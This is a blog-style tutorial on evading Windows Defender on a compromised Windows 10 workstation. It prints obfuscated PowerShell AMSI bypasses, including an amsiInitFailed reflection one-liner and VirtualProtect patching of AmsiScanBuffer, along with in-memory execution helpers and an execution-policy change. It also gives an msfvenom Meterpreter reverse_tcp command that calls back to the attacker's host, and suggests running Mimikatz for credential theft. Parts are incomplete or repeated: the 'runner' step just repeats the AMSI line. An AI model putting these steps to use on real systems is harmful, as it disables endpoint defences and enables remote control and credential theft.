Effective Techniques to Circumvent Windows Defender Safeguards
Written on
Chapter 1: Introduction to Bypassing Windows Defender
In this article, we will explore methods to bypass the latest version of Windows Defender, detailing each step thoroughly.
Requirements
To conduct this operation, you will need the following:
- A Windows 10 machine (the target)
- A compromised low-privilege account on the target
- An attacking Linux machine
- Windows Defender must be running and up-to-date at the time of this writing
Payloads Utilized
Copy[Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true)
Function Definitions
function LookupFunc {
Param ($moduleName, $functionName)
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].
Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
$tmp=@()
$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,
@($moduleName)), $functionName))
}
function getDelegateType {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
[Parameter(Position = 1)] [Type] $delType = [Void]
)
$type = [AppDomain]::CurrentDomain.
DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
[System.Reflection.Emit.AssemblyBuilderAccess]::Run).
DefineDynamicModule('InMemoryModule', $false).
DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',
[System.MulticastDelegate])
$type.
DefineConstructor('RTSpecialName, HideBySig, Public',
[System.Reflection.CallingConventions]::Standard, $func).
SetImplementationFlags('Runtime, Managed')
$type.
DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
SetImplementationFlags('Runtime, Managed')
return $type.CreateType()
}
Steps to Bypass Windows Defender
You, as an attacker or penetration tester, have compromised a low-privilege user account on a workstation within the target organization. Observing that Windows Defender is fully operational and up-to-date, your goal is to execute various scripts and enumeration tools to uncover potential privilege escalation vectors, despite the protective measures in place.
#### Summary of Exploitation
- Bypass the Execution Policy
- Circumvent the Anti-Malware Scanning Interface (AMSI)
- Generate the necessary payload
- Create a PowerShell runner
- Execute the PowerShell runner to launch the final payload
Proof of Concept (PoC)
We will operate under the context of a "testing" user, which is a standard account on the target machine. Let’s first verify the status of Windows Defender on the victim machine:
As shown, Windows Defender is current and fully enabled.
Bypassing Execution Policy
To begin, open a PowerShell terminal on the compromised device and change the Execution Policy to unrestricted with the following command:
Set-ExecutionPolicy Unrestricted -Scope CurrentUser
Next, check if the AMSI is active by executing the command amsiutils. If a red warning appears, it indicates that AMSI is functioning as expected.
Disabling AMSI
Now, to bypass AMSI, copy and paste the provided script from the "Payloads Used" section directly into your PowerShell console:
$xudbk = @"
using System;
using System.Runtime.InteropServices;
public class xudbk {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr pbsxld, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $xudbk
Then execute the following to load the AMSI library and manipulate its behavior:
$wvyfoqc = [xudbk]::LoadLibrary("$(('âmsì.'+'dll').nOrMALIZe([cHAR](70)+[ChAR]([BYTE]0x6f)+[CHAr](114)+[ChAR]([byTe]0x6d)+[CHAR](68*12/12)) -replace [Char](92+19-19)+[cHar]([ByTe]0x70)+[cHaR](123+15-15)+[chAR](77)+[Char](110*102/102)+[cHar]([BytE]0x7d))")
$dhdzwx = [xudbk]::GetProcAddress($wvyfoqc, "$(('ÁmsìScänBu'+'ffer').NorMAlIZE([chaR]([byTE]0x46)+[chAR](111)+[char]([Byte]0x72)+[chAR]([BYtE]0x6d)+[CHar]([byTE]0x44)) -replace [cHar]([BYTe]0x5c)+[CHAr](112)+[cHAR]([bytE]0x7b)+[char]([bytE]0x4d)+[ChAR](110)+[CHAR](125+4-4))")
$p = 0
[xudbk]::VirtualProtect($dhdzwx, [uint32]5, 0x40, [ref]$p)
To verify that AMSI has been successfully bypassed, run amsiutils once more. The absence of the red warning confirms that AMSI is now disabled.
Generating the Meterpreter Payload
Next, create a Meterpreter payload on your attacking machine using MSFVenom. We will utilize port 443 to avoid firewall rules and minimize alert generation:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=443 EXITFUNC=thread -f powershell
Executing the Final Payload
Copy the generated payload into your runner, which can be found in the "Payloads Used" section, and execute it directly in the PowerShell console of the compromised machine.
Copy[Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true)
Final Steps
Now, initiate your listener using Metasploit on your attacking machine. Once everything is set, run the command on the victim's PowerShell console.
Check your listener now!
And there you have it! You have successfully bypassed Windows Defender while all its modules were operational in just five straightforward steps.
Running Mimikatz
To further test your success, attempt to run Mimikatz within the meterpreter shell, which is typically blocked by Defender.